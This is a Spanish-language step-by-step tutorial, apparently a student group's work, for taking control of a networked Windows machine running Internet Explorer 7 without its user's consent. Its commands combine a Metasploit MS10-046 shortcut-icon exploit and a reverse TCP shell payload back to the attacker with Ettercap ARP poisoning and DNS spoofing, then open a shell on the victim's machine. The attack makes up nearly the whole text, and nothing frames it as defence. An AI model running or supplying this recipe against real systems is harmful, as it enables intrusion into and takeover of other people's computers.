Este tipo de ataque se especializa en encontrar alguna vulnerabilidad de cierto software para poder realizar ataques informáticos del lado del cliente.

Objetivo

Tener el control de una maquina que se encuentre en nuestra red sin el consentimiento del usuario de dicha maquina y crear una carpeta en el disco duro a través del navegador que nuestra victima este utilizando.

Herramientas

Para realizar este ataque informático necesitamos:

  • Maquina Atacante
    • BackTrack 5 R2

 

  • Maquina Victima
    • Internet Explorer 7

Pasos a Seguir

Primeramente escogemos nuestra victima y  verificamos que para este caso esté utilizando para navegar en la web el browser “Internet Explorer 7”

En la maquina atacante ejecutamos la consola de comandos de BackTrack

Escribimos msfconsole para abrir la herramienta Metaspolit

Use Windows/browser/ms10_046_shortcut_icon_dllloader

Set payload generic/Shell_revrse_tcp

Set srvhost [ip de la maquina atacante]

Set lhost [ip de la maquina atacante]

Exploit

luego abrimos otra shell para modificar el archivo etter.dns

Locate etter.dns

Nano [pegamos la dirección del archivo etter.dns]

Buscamos la sección donde este escrito Microsoft sucks😉

modificamos la dirección web predeterminado por la dirección de la pagina web a la que deseemos que nuestra victima ingrese.

modificamos la ip predeterminado por la ip de nuestra maquina atacante.

Repetimos los pasos para los siguientes 3 campos como se índice en la figura

Y guardamos los cambios presionando crtl+x
Presionamos Y para aceptar los cambios
Y presionamos enter

Ettercap –T –q  -i eth0 –P dns_spoof –M arp // //

Después de esto ya tenemos ejecutando nuestro dns_spoof y el epliot que será necesario para poder visualizar las ip de nuestras victimas.

Esperamos que nuestra victima ingrese la pagina que le asignamos en el archivo etter.dns , la cual era http://www.cisc.ug.edu.com

Cuando esto suceda la Shell en la que se esta ejecutando nuestro exploit aparecerá la ip de nuestra querida victima

Escribimos sessions –i 1

Y no s aparecerá una línea del Shell de nuestra victima. Con esta podremos ingresar a la maquina de nuestra victima  y tomar el control de ella a través de líneas de comandos.

Como ejemplo podemos crear una carpeta en la maquina victima escribiendo [mkdir atake]  de esta manera se creara la carpeta llamada atake.

Integrantes:

  • Marcos Baque
  • David de la Cruz
  • Robert Cevallos
  • Jessenia Piloso
  • Willian Losado